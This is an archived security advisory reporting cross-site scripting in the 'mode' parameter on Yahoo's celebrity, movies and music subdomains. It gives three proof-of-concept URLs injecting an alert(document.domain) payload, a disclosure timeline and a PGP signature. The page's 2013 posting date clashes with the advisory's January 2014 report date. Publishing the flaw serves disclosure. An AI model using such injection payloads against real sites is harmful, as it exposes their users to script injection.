Yahoo mode Cross Site Scripting

Yahoo mode Cross Site Scripting: Posted Mar 9, 2013; Authored by Stefan Schurtz; The mode parameter on celebrity.yahoo.com, movies.yahoo.com, and music.yahoo.com suffered from a cross site scripting vulnerability.; tags | exploit, xss; SHA-256 | 913fb4b26dfe6be847660658730f8da43bbc26309738ea2037331f12f76b91f8; Download | Favorite | View

Yahoo mode Cross Site Scripting


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

In Jan ?14 I reported three Cross-site Scripting vulnerabilities to the
Yahoo Bug Bounty Program. And I know, it is really really hard, but ...
again ... no feedback or bounty :)

Advisory:                    Yahoo Bug Bounty Program Vulnerability #4
#5 #6 Cross-site Scripting vulnerabilities
Advisory ID:               SSCHADV2014-YahooBB-004 / YahooBB-005 /
YahooBB-006
Author:                       Stefan Schurtz
Affected Software:    Successfully tested on celebrity.yahoo.com,
movies.yahoo.com, music.yahoo.com
Vendor URL:               http://yahoo.com/
Vendor Status:          Not tested anymore
Bounty:                      nothing
 
==========================
Vulnerability Description
==========================
 
The 'mode'-Paramter on "https://celebrity.yahoo.com/",
"https://movies.yahoo.com/", "https://music.yahoo.com/" is prone to a
Cross-site Scripting vulnerability
 
==========================
PoC-Exploit
==========================
 
http://celebrity.yahoo.com/video/george-clooney-responds-tina-fey-230813957.html?m_id=&m_mode=&instance_id=&mode=multipart"-alert(document.domain)-"&__phase=pre&type=index
 
http://movies.yahoo.com/photos/star-wars-cast-rumors-1389647299-slideshow/?m_id=&m_mode=&instance_id=&mode=multipart"-alert(document.domain)-"&__phase=pre&type=index
 
http://music.yahoo.com/videos/?m_id=&m_mode=&instance_id=
mode=multipart"-alert(document.domain)-"&__phase=pre&type=index

==========================
Disclosure Timeline
==========================
 
20-Jan-2014 - vendor informed by contact form (Yahoo Bug Bounty Program)

==========================
Credits
==========================

Vulnerabilities found and advisory written by Stefan Schurtz.

==========================
References
==========================

http://yahoo.com/
http://www.darksecurity.de/advisories/BugBounty/yahoo/SSCHADV2014-YahooBB-004.txt
http://www.darksecurity.de/advisories/BugBounty/yahoo/SSCHADV2014-YahooBB-005.txt
http://www.darksecurity.de/advisories/BugBounty/yahoo/SSCHADV2014-YahooBB-006.txt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)

iEYEARECAAYFAlMa8HkACgkQg3svV2LcbMBo9gCeIc8L/kBFOjdNV8J3pmY65UwV
oFwAn3WBJHwesMpMzG4Z1qxTA10c9sZ0
=+fff
-----END PGP SIGNATURE-----

Top Authors In Last 30 Days

Red Hat 232 files
Ubuntu 59 files
Debian 27 files
Valentin Lobstein 11 files
LiquidWorm 11 files
nu11secur1ty 9 files
Apple 6 files
Milad Karimi 5 files
Google Security Research 5 files
Yevhenii Butenko 4 files

File Archives

Systems

AIX (429)
Apple (2,078)
BSD (376)
CentOS (58)
Cisco (1,927)
Debian (7,022)
Fedora (1,693)
FreeBSD (1,246)
Gentoo (4,467)
HPUX (880)
iOS (373)
iPhone (108)
IRIX (220)
Juniper (69)
Linux (49,318)
Mac OS X (691)
Mandriva (3,105)
NetBSD (256)
OpenBSD (488)
RedHat (15,567)
Slackware (941)
Solaris (1,611)
SUSE (1,444)
Ubuntu (9,456)
UNIX (9,394)
UnixWare (187)
Windows (6,650)
Other

Yahoo mode Cross Site Scripting

Yahoo mode Cross Site Scripting

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Yahoo mode Cross Site Scripting

Share This

Yahoo mode Cross Site Scripting

File Archive:

April 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems